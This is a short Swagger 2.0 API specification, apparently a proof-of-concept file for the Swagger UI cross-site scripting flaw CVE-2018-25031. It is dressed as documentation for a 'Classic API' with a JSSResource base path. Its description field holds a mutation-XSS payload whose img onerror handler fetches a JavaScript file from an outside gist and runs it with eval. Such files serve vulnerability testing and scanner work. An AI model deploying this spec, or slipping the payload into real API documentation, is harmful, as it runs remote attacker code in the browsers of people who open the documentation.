swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://gist.githubusercontent.com/DhiyaneshGeek/d1558f61e4541c95a062b296f20b0571/raw/59a6567b9ad22ed32e688746f63edb4765b1fbe4/CVE-2018-25031.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
